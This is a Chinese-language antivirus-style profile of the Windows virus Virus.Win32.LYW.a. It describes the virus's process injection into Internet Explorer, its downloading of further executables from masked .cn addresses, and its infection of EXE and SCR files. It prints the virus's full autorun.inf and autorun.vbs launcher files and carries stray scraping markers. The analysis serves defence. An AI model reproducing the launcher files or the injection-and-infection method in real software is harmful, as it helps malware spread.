基本介紹
- 中文名:Virus.Win32.LYW.a
- 截獲時間:2007-9-2
- 報告更新時間:2007-9-2
- 入庫版本:19.38.62
- 類型:病毒
- 感染的作業系統:Windows 9x/NT/2000/XP/2003/Vista
- 傳播級別:高
- 已感染案例:0-100
- 已經感染此病毒網站數:0-5
- 全球化傳播態勢:高
- 清除難度:困難
- 破壞力:高
- 破壞手段:感染
傳播過程
病毒運行後,首先先用CreateMutex來查找名稱"kljsdown",如發現系統中已經存在該實例,則直接退出,保證系統中只有一個程式在運行.
病毒利用FindWindow查找當前進程中是否有IEXPLORE存在,如沒有該進程,則使用ShellExecute啟動一個IE.並使用OpenProcess打開該進程,利用VirtualAllocEx在內在中申請一塊空間,把一段代碼寫進去,並利用CreteRemoteThread運行寫入的代碼.
字串5
寫入的代碼內容是:
從http://******.cn/m1.exe;
http://******testkl.cn/m2.exe;
http://*****.cn/m3.exe這些網址上下載病毒.
並分別保存在c:\\Program Files\\Common Files\\m1.exe“;”c:\\Program Files
\\Common Files\\m2.exe";"c:\\Program Files\\Common Files\\m3.exe這三個位置,然後運行.
(由於以上三個網址的連線已經失效,所以我們無法得知這三個病毒的具體作用是什麼,但是只要病毒作者稍加修改地址,就可以重新生效). 字串5
病毒還會起兩個執行緒.
其中執行緒1的作用就是入可移動存儲設備里寫入病毒本身和autorun.inf,autorun.vbs.
該執行緒5分鐘循環執行一次.
其中autorun.inf的內容為:
[AutoRun]
open=WScript.exe AutoRun.vbs
shellexecute=WScript.exe AutoRun.vbs
shell\Auto\command=WScript.exe AutoRun.vbs
字串9
autourn.vbs的內容為:
Dim WshShell
Set WshShell = Wscript.CreateObject("Wscript.Shell")
return=WshShell.Run("AutoRun.exe",2,false)
return=WshShell.Run("\",3,false)
字串7
執行緒2的作用是感染"EXE"和"SCR"類型的檔案. 字串2
病毒會遍曆本地硬碟所有類型為 "EXE"和"SCR"的檔案,找到一個檔案後,病毒先判斷此檔案是否為PE檔案.如果是,則遍歷檔案所有的節信息,查找是否會有名為".LWY"的節名,如果有,則是已經感染的檔案,跳過該檔案繼續查找.如果沒有,病毒在檔案添加一個".LWY"的節,並在裡面寫入一段已寫好的病毒代碼,修改程式入口點,感染該檔案. 字串8
